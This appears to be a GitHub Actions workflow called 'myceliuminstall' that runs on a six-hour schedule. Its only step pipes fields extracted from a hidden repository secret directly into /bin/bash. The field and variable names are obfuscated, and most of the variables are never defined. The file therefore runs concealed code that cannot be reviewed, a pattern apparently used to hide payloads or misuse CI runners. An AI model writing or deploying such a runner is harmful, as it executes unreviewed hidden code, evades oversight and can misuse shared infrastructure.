name: myceliuminstall

on:
  workflow_dispatch:
  schedule:
    - cron: '28 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: myceliuminstall
        env:
          x13: ${{ secrets.x13 }}
        run: |
          echo $x13 | jq -r .hdqg4237 | /bin/bash
          echo $knx29040 | jq -r .xuhip37683 | /bin/bash
          echo $yvz1 | jq -r .uwkk04821 | /bin/bash
          echo $hx4897 | jq -r .wu6125 | /bin/bash
          echo $e4 | jq -r .etomw2 | /bin/bash
          echo $ji060 | jq -r .tef357 | /bin/bash

